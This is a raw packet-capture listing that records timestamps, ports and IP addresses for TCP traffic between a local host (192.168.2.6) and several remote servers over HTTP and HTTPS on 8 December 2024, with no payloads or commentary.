Dec 8, 2024 13:31:23.332066059 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.332139015 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.332170010 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.332214117 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.333022118 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.333148003 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.333174944 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.333314896 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.334017038 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.334074020 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.334079027 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.334166050 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.335066080 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.335150003 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.335177898 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.335212946 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.356385946 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.356404066 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.356522083 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.356522083 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.356534004 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.356719017 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.376931906 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.376949072 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.377103090 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.377120018 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.377366066 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.392561913 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.392656088 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.392677069 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.392698050 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.393059015 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.393141031 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.393148899 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.393412113 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.394088984 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.394191980 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.394216061 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.394608974 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.394637108 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.394653082 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.394670963 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.394675016 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.394700050 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.394731998 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.394761086 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.395032883 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.395129919 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.395138979 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.395266056 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.396023989 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.396087885 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.396111965 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.396759987 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.397104025 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.397186041 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.397233009 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.398035049 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.398118019 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.398139954 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.398292065 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.399068117 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.399135113 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.399169922 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.399969101 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.400110960 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.400135040 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.400315046 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.401091099 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.401238918 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.401268959 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.401355982 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.401957989 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.402057886 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.402066946 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.402147055 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.403516054 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.403599024 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.403716087 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.404086113 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.404282093 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.404356003 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.404386044 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.404510975 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.404958963 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.405036926 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.405145884 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.405931950 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.406065941 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.406090021 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.406282902 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.407104969 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.407305956 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.407370090 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.407444954 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.409030914 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.409081936 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.409202099 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.410641909 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.410789013 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.410907984 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.411027908 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.412595034 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.413059950 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.413145065 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.414779902 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.414902925 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.414931059 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.415528059 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.415605068 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.415632010 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.415869951 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.416285992 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.416343927 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.416366100 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.416991949 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.417031050 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.417052984 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.417140007 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.417682886 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.417717934 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.417741060 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.417993069 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.418317080 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.418401003 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.418503046 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.419080973 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.419202089 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.419405937 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.419747114 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.419827938 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.420011997 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.450598955 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.450716019 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.450737000 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.450956106 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.451028109 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.451118946 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.451131105 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.451219082 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.452038050 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.452126026 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.452126980 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.452224970 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.453077078 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.453197002 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.453232050 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.453340054 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.454180002 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.454391003 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.454737902 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.455121994 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.455210924 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.455235004 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.456074953 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.456171989 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.456201077 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.456302881 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.456999063 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.457087994 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.457175016 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.457947969 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.458054066 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.458297014 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.458931923 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.458980083 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.459098101 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.459906101 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.460021973 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.460068941 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.460068941 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.460923910 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.461028099 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.461066961 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.461393118 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.462078094 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.462172031 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.462203026 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.462280035 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.463469982 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.463547945 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.463612080 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.463670015 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.464875937 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.464972019 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.465007067 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.465137959 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.465770006 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.465850115 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.465877056 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.466362953 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.466556072 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.466581106 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.466717005 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.466744900 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.466934919 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.466989040 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.466995001 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.467022896 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.470021963 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.483604908 CET	443	49743	23.206.197.26	192.168.2.6
Dec 8, 2024 13:31:23.483629942 CET	443	49743	23.206.197.26	192.168.2.6
Dec 8, 2024 13:31:23.483828068 CET	49743	443	192.168.2.6	23.206.197.26
Dec 8, 2024 13:31:23.483843088 CET	443	49743	23.206.197.26	192.168.2.6
Dec 8, 2024 13:31:23.483951092 CET	443	49743	23.206.197.26	192.168.2.6
Dec 8, 2024 13:31:23.483979940 CET	49743	443	192.168.2.6	23.206.197.26
Dec 8, 2024 13:31:23.485714912 CET	49743	443	192.168.2.6	23.206.197.26
Dec 8, 2024 13:31:23.487787008 CET	49743	443	192.168.2.6	23.206.197.26
Dec 8, 2024 13:31:23.487802029 CET	443	49743	23.206.197.26	192.168.2.6
Dec 8, 2024 13:31:23.489768028 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.489809036 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.489918947 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.489918947 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.489945889 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.490102053 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.505852938 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.505876064 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.505984068 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.505984068 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.505995035 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.506086111 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.514220953 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.514240026 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.514367104 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.514367104 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.514398098 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.518042088 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.518457890 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.518549919 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.518564939 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.518591881 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.518780947 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.518821001 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.518891096 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.519907951 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.519959927 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.519975901 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.520205021 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.520876884 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.520900011 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.520917892 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.520987988 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.521173954 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.521193027 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.521279097 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.521279097 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.521287918 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.521446943 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.521733999 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.521815062 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.521827936 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.521915913 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.522727013 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.522795916 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.522854090 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.522854090 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.523705959 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.523833036 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.523974895 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.524734974 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.524827957 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.524864912 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.525015116 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.525723934 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.525734901 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.525932074 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.526690006 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.526803970 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.526879072 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.526879072 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.527677059 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.527875900 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.534488916 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.534512997 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.534601927 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.534601927 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.534611940 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.534708023 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.547342062 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.547359943 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.547665119 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.547679901 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.548022032 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.558506012 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.558525085 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.558631897 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.558633089 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.558645010 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.558742046 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.565673113 CET	443	49736	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.565736055 CET	443	49736	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.565833092 CET	49736	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.566164017 CET	49736	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.566164017 CET	49736	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.566191912 CET	443	49736	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.566196918 CET	443	49736	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.568630934 CET	49752	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.568680048 CET	443	49752	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.568800926 CET	49752	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.569962978 CET	49752	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.569977045 CET	443	49752	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.578949928 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.578980923 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.579080105 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.579091072 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.579111099 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.579186916 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.580696106 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.580789089 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.580813885 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.581008911 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.581079960 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.581083059 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.581083059 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.581132889 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.581975937 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.582083941 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.582104921 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.582189083 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.582963943 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.583064079 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.583168030 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.584563971 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.584779024 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.584934950 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.585084915 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.585206032 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.585486889 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.586107016 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.586119890 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.586364985 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.587064981 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.587116003 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.587132931 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.587184906 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.588064909 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.588150024 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.588283062 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.589034081 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.589154959 CET	80	49724	185.215.113.206	192.168.2.6
